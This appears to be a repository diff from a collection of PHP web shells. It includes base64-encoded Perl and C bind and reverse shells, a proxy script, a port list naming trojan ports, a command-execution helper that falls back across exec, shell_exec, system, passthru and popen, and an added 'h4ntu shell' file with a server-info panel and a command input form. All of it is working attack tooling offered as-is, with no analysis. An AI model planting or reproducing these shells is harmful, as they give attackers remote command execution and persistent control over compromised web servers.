$port_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
lIENPTk47DQpleGl0IDA7DQp9DQp9";
$back_connect_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
$prx1="IyEvaG9tZS9tZXJseW4vYmluL3BlcmwgLXcNCiMjIw0KIyMjaHR0cDovL2ZvcnVtLndlYi1oYWNrLnJ1L2luZGV4LnBocD9zaG93dG9waWM9
MjY3MDYmc3Q9MCYjZW50cnkyNDYzNDQNCiMjIw0KDQp1c2Ugc3RyaWN0Ow0KJEVOVntQQVRIfSA9IGpvaW4gXCI6XCIsIHF3KC91c3IvdWNiIC9iaW4
gL3Vzci9iaW4pOw0KJHwrKzsNCg0KIyMgQ29weXJpZ2h0IChjKSAxOTk2IGJ5IFJhbmRhbCBMLiBTY2h3YXJ0eg0KIyMgVGhpcyBwcm9ncmFtIGlzIG
ZyZWUgc29mdHdhcmU7IHlvdSBjYW4gcmVkaXN0cmlidXRlIGl0DQojIyBhbmQvb3IgbW9kaWZ5IGl0IHVuZGVyIHRoZSBzYW1lIHRlcm1zIGFzIFBlc
mwgaXRzZWxmLg0KDQojIyBBbm9ueW1vdXMgSFRUUCBwcm94eSAoaGFuZGxlcyBodHRwOiwgZ29waGVyOiwgZnRwOikNCiMjIHJlcXVpcmVzIExXUCA1
LjA0IG9yIGxhdGVyDQoNCm15ICRIT1NUID0gXCJsb2NhbGhvc3RcIjsNCm15ICRQT1JUID0gXCI=";
$prx2="XCI7DQoNCnN1YiBwcmVmaXggew0KIG15ICRub3cgPSBsb2NhbHRpbWU7DQoNCiBqb2luIFwiXCIsIG1hcCB7IFwiWyRub3ddIFskeyR9XSAk
X1xcblwiIH0gc3BsaXQgL1xcbi8sIGpvaW4gXCJcIiwgQF87DQp9DQoNCiRTSUd7X19XQVJOX199ID0gc3ViIHsgd2FybiBwcmVmaXggQF8gfTsNCiR
TSUd7X19ESUVfX30gPSBzdWIgeyBkaWUgcHJlZml4IEBfIH07DQokU0lHe0NMRH0gPSAkU0lHe0NITER9ID0gc3ViIHsgd2FpdDsgfTsNCg0KbXkgJE
FHRU5UOyAgICMgZ2xvYmFsIHVzZXIgYWdlbnQgKGZvciBlZmZpY2llbmN5KQ0KQkVHSU4gew0KIHVzZSBMV1A6OlVzZXJBZ2VudDsNCg0KIEBNeUFnZ
W50OjpJU0EgPSBxdyhMV1A6OlVzZXJBZ2VudCk7ICMgc2V0IGluaGVyaXRhbmNlDQoNCiAkQUdFTlQgPSBNeUFnZW50LT5uZXc7DQogJEFHRU5ULT5h
Z2VudChcImFub24vMC4wN1wiKTsNCiAkQUdFTlQtPmVudl9wcm94eTsNCn0NCg0Kc3ViIE15QWdlbnQ6OnJlZGlyZWN0X29rIHsgMCB9ICMgcmVkaXJ
lY3RzIHNob3VsZCBwYXNzIHRocm91Z2gNCg0KeyAgICAjIyMgTUFJTiAjIyMNCiB1c2UgSFRUUDo6RGFlbW9uOw0KDQogbXkgJG1hc3RlciA9IG5ldy
BIVFRQOjpEYWVtb24NCiAgIExvY2FsQWRkciA9PiAkSE9TVCwgTG9jYWxQb3J0ID0+ICRQT1JUOw0KIHdhcm4gXCJzZXQgeW91ciBwcm94eSB0byA8V
VJMOlwiLCAkbWFzdGVyLT51cmwsIFwiPlwiOw0KIG15ICRzbGF2ZTsNCiAmaGFuZGxlX2Nvbm5lY3Rpb24oJHNsYXZlKSB3aGlsZSAkc2xhdmUgPSAk
bWFzdGVyLT5hY2NlcHQ7DQogZXhpdCAwOw0KfSAgICAjIyMgRU5EIE1BSU4gIyMjDQoNCnN1YiBoYW5kbGVfY29ubmVjdGlvbiB7DQogbXkgJGNvbm5
lY3Rpb24gPSBzaGlmdDsgIyBIVFRQOjpEYWVtb246OkNsaWVudENvbm4NCg0KIG15ICRwaWQgPSBmb3JrOw0KIGlmICgkcGlkKSB7ICAgIyBzcGF3bi
BPSywgYW5kIElcJ20gdGhlIHBhcmVudA0KICAgY2xvc2UgJGNvbm5lY3Rpb247DQogICByZXR1cm47DQogfQ0KICMjIHNwYXduIGZhaWxlZCwgb3IgS
VwnbSBhIGdvb2QgY2hpbGQNCiBteSAkcmVxdWVzdCA9ICRjb25uZWN0aW9uLT5nZXRfcmVxdWVzdDsNCiBpZiAoZGVmaW5lZCgkcmVxdWVzdCkpIHsN
CiAgIG15ICRyZXNwb25zZSA9ICZmZXRjaF9yZXF1ZXN0KCRyZXF1ZXN0KTsNCiAgICRjb25uZWN0aW9uLT5zZW5kX3Jlc3BvbnNlKCRyZXNwb25zZSk
7DQogICBjbG9zZSAkY29ubmVjdGlvbjsNCiB9DQogZXhpdCAwIGlmIGRlZmluZWQgJHBpZDsgIyBleGl0IGlmIElcJ20gYSBnb29kIGNoaWxkIHdpdG
ggYSBnb29kIHBhcmVudA0KfQ0KDQpzdWIgZmV0Y2hfcmVxdWVzdCB7DQogbXkgJHJlcXVlc3QgPSBzaGlmdDsgICMgSFRUUDo6UmVxdWVzdA0KDQogd
XNlIEhUVFA6OlJlc3BvbnNlOw0KDQogbXkgJHVybCA9ICRyZXF1ZXN0LT51cmw7DQogd2FybiBcImZldGNoaW5nICR1cmxcIjsNCiBpZiAoJHVybC0+
c2NoZW1lICF+IC9eKGh0dHB8Z29waGVyfGZ0cCkkLykgew0KICAgbXkgJHJlcyA9IEhUVFA6OlJlc3BvbnNlLT5uZXcoNDAzLCBcIkZvcmJpZGRlblw
iKTsNCiAgICRyZXMtPmNvbnRlbnQoXCJiYWQgc2NoZW1lOiBAe1skdXJsLT5zY2hlbWVdfVxcblwiKTsNCiAgICRyZXM7DQogfSBlbHNpZiAobm90IC
R1cmwtPnJlbC0+bmV0bG9jKSB7DQogICBteSAkcmVzID0gSFRUUDo6UmVzcG9uc2UtPm5ldyg0MDMsIFwiRm9yYmlkZGVuXCIpOw0KICAgJHJlcy0+Y
29udGVudChcInJlbGF0aXZlIFVSTCBub3QgcGVybWl0dGVkXFxuXCIpOw0KICAgJHJlczsNCiB9IGVsc2Ugew0KICAgJmZldGNoX3ZhbGlkYXRlZF9y
ZXF1ZXN0KCRyZXF1ZXN0KTsNCiB9DQp9DQoNCnN1YiBmZXRjaF92YWxpZGF0ZWRfcmVxdWVzdCB7DQogbXkgJHJlcXVlc3QgPSBzaGlmdDsgIyBIVFR
QOjpSZXF1ZXN0DQoNCiAjIyB1c2VzIGdsb2JhbCAkQUdFTlQNCg0KICMjIHdhcm4gXCJvcmlnIHJlcXVlc3Q6IDw8PFwiLCAkcmVxdWVzdC0+aGVhZG
Vyc19hc19zdHJpbmcsIFwiPj4+XCI7DQogJHJlcXVlc3QtPnJlbW92ZV9oZWFkZXIocXcoVXNlci1BZ2VudCBGcm9tIFJlZmVyZXIgQ29va2llKSk7D
QogIyMgd2FybiBcImFub24gcmVxdWVzdDogPDw8XCIsICRyZXF1ZXN0LT5oZWFkZXJzX2FzX3N0cmluZywgXCI+Pj5cIjsNCiBteSAkcmVzcG9uc2Ug
PSAkQUdFTlQtPnJlcXVlc3QoJHJlcXVlc3QpOw0KICMjIHdhcm4gXCJvcmlnIHJlc3BvbnNlOiA8PDxcIiwgJHJlc3BvbnNlLT5oZWFkZXJzX2FzX3N
0cmluZywgXCI+Pj5cIjsNCiAkcmVzcG9uc2UtPnJlbW92ZV9oZWFkZXIocXcoU2V0LUNvb2tpZSkpOw0KICMjIHdhcm4gXCJhbm9uIHJlc3BvbnNlOi
A8PDxcIiwgJHJlc3BvbnNlLT5oZWFkZXJzX2FzX3N0cmluZywgXCI+Pj5cIjsNCiAkcmVzcG9uc2U7DQp9";
$port[1] = "tcpmux (TCP Port Service Multiplexer)";
$port[2] = "Management Utility";
$port[3] = "Compression Process";
$port[5] = "rje (Remote Job Entry)";
$port[7] = "echo";
$port[9] = "discard";
$port[11] = "systat";
$port[13] = "daytime";
$port[15] = "netstat";
$port[17] = "quote of the day";
$port[18] = "send/rwp";
$port[19] = "character generator";
$port[20] = "ftp-data";
$port[21] = "ftp";
$port[22] = "ssh, pcAnywhere";
$port[23] = "Telnet";
$port[25] = "SMTP (Simple Mail Transfer)";
$port[27] = "ETRN (NSW User System FE)";
$port[29] = "MSG ICP";
$port[31] = "MSG Authentication";
$port[33] = "dsp (Display Support Protocol)";
$port[37] = "time";
$port[38] = "RAP (Route Access Protocol)";
$port[39] = "rlp (Resource Location Protocol)";
$port[41] = "Graphics";
$port[42] = "nameserv, WINS";
$port[43] = "whois, nickname";
$port[44] = "MPM FLAGS Protocol";
$port[45] = "Message Processing Module [recv]";
$port[46] = "MPM [default send]";
$port[47] = "NI FTP";
$port[48] = "Digital Audit Daemon";
$port[49] = "TACACS, Login Host Protocol";
$port[50] = "RMCP, re-mail-ck";
$port[53] = "DNS";
$port[57] = "MTP (any private terminal access)";
$port[59] = "NFILE";
$port[60] = "Unassigned";
$port[61] = "NI MAIL";
$port[62] = "ACA Services";
$port[63] = "whois++";
$port[64] = "Communications Integrator (CI)";
$port[65] = "TACACS-Database Service";
$port[66] = "Oracle SQL*NET";
$port[67] = "bootps (Bootstrap Protocol Server)";
$port[68] = "bootpd/dhcp (Bootstrap Protocol Client)";
$port[69] = "Trivial File Transfer Protocol (tftp)";
$port[70] = "Gopher";
$port[71] = "Remote Job Service";
$port[72] = "Remote Job Service";
$port[73] = "Remote Job Service";
$port[74] = "Remote Job Service";
$port[75] = "any private dial out service";
$port[76] = "Distributed External Object Store";
$port[77] = "any private RJE service";
$port[78] = "vettcp";
$port[79] = "finger";
$port[80] = "World Wide Web HTTP";
$port[81] = "HOSTS2 Name Serve";
$port[82] = "XFER Utility";
$port[83] = "MIT ML Device";
$port[84] = "Common Trace Facility";
$port[85] = "MIT ML Device";
$port[86] = "Micro Focus Cobol";
$port[87] = "any private terminal link";
$port[88] = "Kerberos, WWW";
$port[89] = "SU/MIT Telnet Gateway";
$port[90] = "DNSIX Securit Attribute Token Map";
$port[91] = "MIT Dover Spooler";
$port[92] = "Network Printing Protocol";
$port[93] = "Device Control Protocol";
$port[94] = "Tivoli Object Dispatcher";
$port[95] = "supdup";
$port[96] = "DIXIE";
$port[98] = "linuxconf";
$port[99] = "Metagram Relay";
$port[100] = "[unauthorized use]";
$port[101] = "HOSTNAME";
$port[102] = "ISO, X.400, ITOT";
$port[103] = "Genesis Point-to-Point";
$port[104] = "ACR-NEMA Digital Imag. & Comm. 300";
$port[105] = "CCSO name server protocol";
$port[106] = "poppassd";
$port[107] = "Remote Telnet Service";
$port[108] = "SNA Gateway Access Server";
$port[109] = "POP2";
$port[110] = "POP3";
$port[111] = "Sun RPC Portmapper";
$port[112] = "McIDAS Data Transmission Protocol";
$port[113] = "Authentication Service";
$port[115] = "sftp (Simple File Transfer Protocol)";
$port[116] = "ANSA REX Notify";
$port[117] = "UUCP Path Service";
$port[118] = "SQL Services";
$port[119] = "NNTP";
$port[120] = "CFDP";
$port[123] = "NTP";
$port[124] = "SecureID";
$port[129] = "PWDGEN";
$port[133] = "statsrv";
$port[135] = "loc-srv/epmap";
$port[137] = "netbios-ns";
$port[138] = "netbios-dgm (UDP)";
$port[139] = "NetBIOS";
$port[143] = "IMAP";
$port[144] = "NewS";
$port[150] = "SQL-NET";
$port[152] = "BFTP";
$port[153] = "SGMP";
$port[156] = "SQL Service";
$port[161] = "SNMP";
$port[175] = "vmnet";
$port[177] = "XDMCP";
$port[178] = "NextStep Window Server";
$port[179] = "BGP";
$port[180] = "SLmail admin";
$port[199] = "smux";
$port[210] = "Z39.50";
$port[213] = "IPX";
$port[218] = "MPP";
$port[220] = "IMAP3";
$port[256] = "RAP";
$port[257] = "Secure Electronic Transaction";
$port[258] = "Yak Winsock Personal Chat";
$port[259] = "ESRO";
$port[264] = "FW1_topo";
$port[311] = "Apple WebAdmin";
$port[350] = "MATIP type A";
$port[351] = "MATIP type B";
$port[363] = "RSVP tunnel";
$port[366] = "ODMR (On-Demand Mail Relay)";
$port[371] = "Clearcase";
$port[387] = "AURP (AppleTalk Update-Based Routing Protocol)";
$port[389] = "LDAP";
$port[407] = "Timbuktu";
$port[427] = "Server Location";
$port[434] = "Mobile IP";
$port[443] = "ssl";
$port[444] = "snpp, Simple Network Paging Protocol";
$port[445] = "SMB";
$port[458] = "QuickTime TV/Conferencing";
$port[468] = "Photuris";
$port[475] = "tcpnethaspsrv";
$port[500] = "ISAKMP, pluto";
$port[511] = "mynet-as";
$port[512] = "biff, rexec";
$port[513] = "who, rlogin";
$port[514] = "syslog, rsh";
$port[515] = "lp, lpr, line printer";
$port[517] = "talk";
$port[520] = "RIP (Routing Information Protocol)";
$port[521] = "RIPng";
$port[522] = "ULS";
$port[531] = "IRC";
$port[543] = "KLogin, AppleShare over IP";
$port[545] = "QuickTime";
$port[548] = "AFP";
$port[554] = "Real Time Streaming Protocol";
$port[555] = "phAse Zero";
$port[563] = "NNTP over SSL";
$port[575] = "VEMMI";
$port[581] = "Bundle Discovery Protocol";
$port[593] = "MS-RPC";
$port[608] = "SIFT/UFT";
$port[626] = "Apple ASIA";
$port[631] = "IPP (Internet Printing Protocol)";
$port[635] = "RLZ DBase";
$port[636] = "sldap";
$port[642] = "EMSD";
$port[648] = "RRP (NSI Registry Registrar Protocol)";
$port[655] = "tinc";
$port[660] = "Apple MacOS Server Admin";
$port[666] = "Doom";
$port[674] = "ACAP";
$port[687] = "AppleShare IP Registry";
$port[700] = "buddyphone";
$port[705] = "AgentX for SNMP";
$port[901] = "swat, realsecure";
$port[993] = "s-imap";
$port[995] = "s-pop";
$port[1024] = "Reserved";
$port[1025] = "network blackjack";
$port[1062] = "Veracity";
$port[1080] = "SOCKS";
$port[1085] = "WebObjects";
$port[1227] = "DNS2Go";
$port[1243] = "SubSeven";
$port[1338] = "Millennium Worm";
$port[1352] = "Lotus Notes";
$port[1381] = "Apple Network License Manager";
$port[1417] = "Timbuktu Service 1 Port";
$port[1418] = "Timbuktu Service 2 Port";
$port[1419] = "Timbuktu Service 3 Port";
$port[1420] = "Timbuktu Service 4 Port";
$port[1433] = "Microsoft SQL Server";
$port[1434] = "Microsoft SQL Monitor";
$port[1477] = "ms-sna-server";
$port[1478] = "ms-sna-base";
$port[1490] = "insitu-conf";
$port[1494] = "Citrix ICA Protocol";
$port[1498] = "Watcom-SQL";
$port[1500] = "VLSI License Manager";
$port[1503] = "T.120";
$port[1521] = "Oracle SQL";
$port[1522] = "Ricardo North America License Manager";
$port[1524] = "ingres";
$port[1525] = "prospero";
$port[1526] = "prospero";
$port[1527] = "tlisrv";
$port[1529] = "oracle";
$port[1547] = "laplink";
$port[1604] = "Citrix ICA, MS Terminal Server";
$port[1645] = "RADIUS Authentication";
$port[1646] = "RADIUS Accounting";
$port[1680] = "Carbon Copy";
$port[1701] = "L2TP/LSF";
$port[1717] = "Convoy";
$port[1720] = "H.323/Q.931";
$port[1723] = "PPTP control port";
$port[1731] = "MSICCP";
$port[1755] = "Windows Media .asf";
$port[1758] = "TFTP multicast";
$port[1761] = "cft-0";
$port[1762] = "cft-1";
$port[1763] = "cft-2";
$port[1764] = "cft-3";
$port[1765] = "cft-4";
$port[1766] = "cft-5";
$port[1767] = "cft-6";
$port[1808] = "Oracle-VP2";
$port[1812] = "RADIUS server";
$port[1813] = "RADIUS accounting";
$port[1818] = "ETFTP";
$port[1973] = "DLSw DCAP/DRAP";
$port[1985] = "HSRP";
$port[1999] = "Cisco AUTH";
$port[2001] = "glimpse";
$port[2049] = "NFS";
$port[2064] = "distributed.net";
$port[2065] = "DLSw";
$port[2066] = "DLSw";
$port[2106] = "MZAP";
$port[2140] = "DeepThroat";
$port[2301] = "Compaq Insight Management Web Agents";
$port[2327] = "Netscape Conference";
$port[2336] = "Apple UG Control";
$port[2427] = "MGCP gateway";
$port[2504] = "WLBS";
$port[2535] = "MADCAP";
$port[2543] = "sip";
$port[2592] = "netrek";
$port[2727] = "MGCP call agent";
$port[2628] = "DICT";
$port[2998] = "ISS Real Secure Console Service Port";
$port[3000] = "Firstclass";
$port[3001] = "Redwood Broker";
$port[3031] = "Apple AgentVU";
$port[3128] = "squid";
$port[3130] = "ICP";
$port[3150] = "DeepThroat";
$port[3264] = "ccmail";
$port[3283] = "Apple NetAssitant";
$port[3288] = "COPS";
$port[3305] = "ODETTE";
$port[3306] = "mySQL";
$port[3389] = "RDP Protocol (Terminal Server)";
$port[3521] = "netrek";
$port[4000] = "icq, command-n-conquer and shell nfm";
$port[4321] = "rwhois";
$port[4333] = "mSQL";
$port[4444] = "KRB524";
$port[4827] = "HTCP";
$port[5002] = "radio free ethernet";
$port[5004] = "RTP";
$port[5005] = "RTP";
$port[5010] = "Yahoo! Messenger";
$port[5050] = "multimedia conference control tool";
$port[5060] = "SIP";
$port[5150] = "Ascend Tunnel Management Protocol";
$port[5190] = "AIM";
$port[5500] = "securid";
$port[5501] = "securidprop";
$port[5423] = "Apple VirtualUser";
$port[5555] = "Personal Agent";
$port[5631] = "PCAnywhere data";
$port[5632] = "PCAnywhere";
$port[5678] = "Remote Replication Agent Connection";
$port[5800] = "VNC";
$port[5801] = "VNC";
$port[5900] = "VNC";
$port[5901] = "VNC";
$port[6000] = "X Windows";
$port[6112] = "BattleNet";
$port[6502] = "Netscape Conference";
$port[6667] = "IRC";
$port[6670] = "VocalTec Internet Phone, DeepThroat";
$port[6699] = "napster";
$port[6776] = "Sub7";
$port[6970] = "RTP";
$port[7007] = "MSBD, Windows Media encoder";
$port[7070] = "RealServer/QuickTime";
$port[7777] = "cbt";
$port[7778] = "Unreal";
$port[7648] = "CU-SeeMe";
$port[7649] = "CU-SeeMe";
$port[8000] = "iRDMI/Shoutcast Server";
$port[8010] = "WinGate 2.1";
$port[8080] = "HTTP";
$port[8181] = "HTTP";
$port[8383] = "IMail WWW";
$port[8875] = "napster";
$port[8888] = "napster";
$port[8889] = "Desktop Data TCP 1";
$port[8890] = "Desktop Data TCP 2";
$port[8891] = "Desktop Data TCP 3: NESS application";
$port[8892] = "Desktop Data TCP 4: FARM product";
$port[8893] = "Desktop Data TCP 5: NewsEDGE/Web application";
$port[8894] = "Desktop Data TCP 6: COAL application";
$port[9000] = "CSlistener";
$port[10008] = "cheese worm";
$port[11371] = "PGP 5 Keyserver";
$port[13223] = "PowWow";
$port[13224] = "PowWow";
$port[14237] = "Palm";
$port[14238] = "Palm";
$port[18888] = "LiquidAudio";
$port[21157] = "Activision";
$port[22555] = "Vocaltec Web Conference";
$port[23213] = "PowWow";
$port[23214] = "PowWow";
$port[23456] = "EvilFTP";
$port[26000] = "Quake";
$port[27001] = "QuakeWorld";
$port[27010] = "Half-Life";
$port[27015] = "Half-Life";
$port[27960] = "QuakeIII";
$port[30029] = "AOL Admin";
$port[31337] = "Back Orifice";
$port[32777] = "rpc.walld";
$port[45000] = "Cisco NetRanger postofficed";
$port[32773] = "rpc bserverd";
$port[32776] = "rpc.spray";
$port[32779] = "rpc.cmsd";
$port[38036] = "timestep";
$port[40193] = "Novell";
$port[41524] = "arcserve discovery";
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////ÔÓÍÊÖÈÈ/////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////
function rep_char($ch,$count) //Ïîâòîðåíèå ñèìâîëà
{
$res="";
for($i=0; $i<=$count; ++$i){
$res.=$ch."";
}
return $res;
}
function ex($comd) //Âûïîëíåíèå êîìàíäû
{
$res = '';
if (!empty($comd)){
if(function_exists('exec')){
exec($comd,$res);
$res=implode("\n",$res);
}elseif(function_exists('shell_exec')){
$res=shell_exec($comd);
}elseif(function_exists('system')){
ob_start();
system($comd);
$res=ob_get_contents();
ob_end_clean();
}elseif(function_exists('passthru')){
ob_start();
passthru($comd);
$res=ob_get_contents();
ob_end_clean();
}elseif(is_resource($f=popen($comd,"r"))){
$res = "";
while(!feof($f)) { $res.=fread($f,1024); }
pclose($f);
}
}
return $res;
}
function sysinfo() //Âûâîä SYSINFO
{
global $curl_on, $dis_func, $mysql_stat, $safe_mode, $server, $HTTP_SERVER_VARS;
echo("<b><font face=Verdana size=2> System information:<br><font size=-2>
<hr>");
echo (($safe_mode)?("Safe Mode: </b><font color=green>ON</font><b> "):
("Safe Mode: </b><font color=red>OFF</font><b> "));
$row_dis_func=explode(', ',$dis_func);
echo ("PHP: </b><font color=blue>".phpversion()."</font><b> ");
echo ("MySQL: </b>");
if($mysql_stat){
echo "<font color=green>ON </font><b>";
}
else {
echo "<font color=red>OFF </font><b>";
}
echo "cURL: </b>";
if($curl_on){
echo "<font color=green>ON</font><b><br>";
}else
echo "<font color=red>OFF</font><b><br>";
if ($dis_func!=""){
echo "Disabled Functions: </b><font color=red>".$dis_func."</font><br><b>";
}
$uname=ex('uname -a');
echo "OS: </b><font color=blue>";
if (empty($uname)){
echo (php_uname()."</font><br><b>");
}else
echo $uname."</font><br><b>";
$id = ex('id');
echo "SERVER: </b><font color=blue>".$server."</font><br><b>";
echo "id: </b><font color=blue>";
if (!empty($id)){
echo $id."</font><br><b>";
}else
echo "user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid().
"</font><br><b>";
echo "<b>RemoteAddress:</b><font color=red>".$HTTP_SERVER_VARS['REMOTE_ADDR']."</font><br>";
if(isset($HTTP_SERVER_VARS['HTTP_X_FORWARDED_FOR'])){
echo "<b>RemoteAddressIfProxy:</b><font color=red>".$HTTP_SERVER_VARS['HTTP_X_FORWARDED_FOR']."</font>";
}
echo "<hr size=3 color=black>";
echo "</font></font>";
}
function read_dir($dir) //÷èòàåì ïàïêó
{
$d=opendir($dir);
$i=0;
while($r=readdir($d)){
$res[$i]=$r;
$i++;
}
return $res;
}
function permissions($mode,$file) { //îïðåäåëåíèå ñâîéñòâ
$type=filetype($file);
$perms=$type[0];
$perms.=($mode & 00400) ? "r" : "-";
$perms.=($mode & 00200) ? "w" : "-";
$perms.=($mode & 00100) ? "x" : "-";
$perms.=($mode & 00040) ? "r" : "-";
$perms.=($mode & 00020) ? "w" : "-";
$perms.=($mode & 00010) ? "x" : "-";
$perms.=($mode & 00004) ? "r" : "-";
$perms.=($mode & 00002) ? "w" : "-";
$perms.=($mode & 00001) ? "x" : "-";
$perms.="(".$mode.")";
return $perms;
}
function open_file($fil, $m, $d) //Îòêðûòü ôàéë
{
if (!($fp=fopen($fil,$m))) {
$res="Error opening file!\n";
}else{
ob_start();
readfile($fil);
$res=ob_get_contents();
ob_end_clean();
if (!(fclose($fp))){
$res="ERROR CLOSE";
}
}
echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
echo "<table BORDER=1 align=center>";
echo "<tr><td alling=center><b> ".$fil." </b></td></tr>";
echo "<tr><td alling=center><textarea name=\"text\" cols=90 rows=15>";
echo $res;
echo "

1575
138shell/G/gfs_sh.php.txt Normal file
View file

File diff suppressed because it is too large Load diff

1575
138shell/G/gfs_sh.txt Normal file
View file

File diff suppressed because it is too large Load diff

78
138shell/H/h4ntu shell [powered by tsoi].txt Normal file
View file

@ -0,0 +1,78 @@
<title>h4ntu shell [powered by tsoi]</title>
<?php
echo "<p><font size=2 face=Verdana><b>This Is The Server Information</b></font></p>";
?>
<?php
closelog( );
$user = get_current_user( );
$login = posix_getuid( );
$euid = posix_geteuid( );
$ver = phpversion( );
$gid = posix_getgid( );
if ($chdir == "") $chdir = getcwd( );
if(!$whoami)$whoami=exec("whoami");
?>
<meta name="generator" content="Namo WebEditor v5.0">
<br>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="0">
<?php
$uname = posix_uname( );
while (list($info, $value) = each ($uname)) {
?>
<TR>
<TD><DIV STYLE="font-family: verdana; font-size: 10px;"><?= $info ?>: <?= $value ?></DIV></TD>
</TR>
<?php
}
?>
<TR>
<TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>User Info:</b> uid=<?= $login ?>(<?= $whoami?>) euid=<?= $euid ?>(<?= $whoami?>) gid=<?= $gid ?>(<?= $whoami?>)</DIV></TD>
</TR>
<TR>
<TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>Current Path:</b> <?= $chdir ?></DIV></TD>
</TR>
<TR>
<TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>Permission Directory:</b> <? if(@is_writable($chdir)){ echo "Yes"; }else{ echo "No"; } ?></DIV></TD>
</TR>
<TR>
<TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>Server Services:</b> <?= "$SERVER_SOFTWARE $SERVER_VERSION"; ?></DIV></TD>
</TR>
<TR>
<TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>Server Adress:</b> <?= "$SERVER_ADDR $SERVER_NAME"; ?></DIV></TD>
</TR>
<TR>
<TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>Script Current User:</b> <?= $user ?></DIV></TD>
</TR>
<TR>
<TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>PHP Version:</b> <?= $ver ?></DIV></TD>
</TR>
</TABLE>
<BR>
<font face="courier new" size="2" color="777777"><b>#</b>php injection: <br>
</font><FORM name=injection METHOD=POST ACTION="<?php echo $_SERVER["REQUEST_URI"];?>">
<font face="courier new" size="2" color="777777">cmd :
<INPUT TYPE="text" NAME="cmd" value="<?php echo stripslashes(htmlentities($_POST['cmd'])); ?>" size="161">
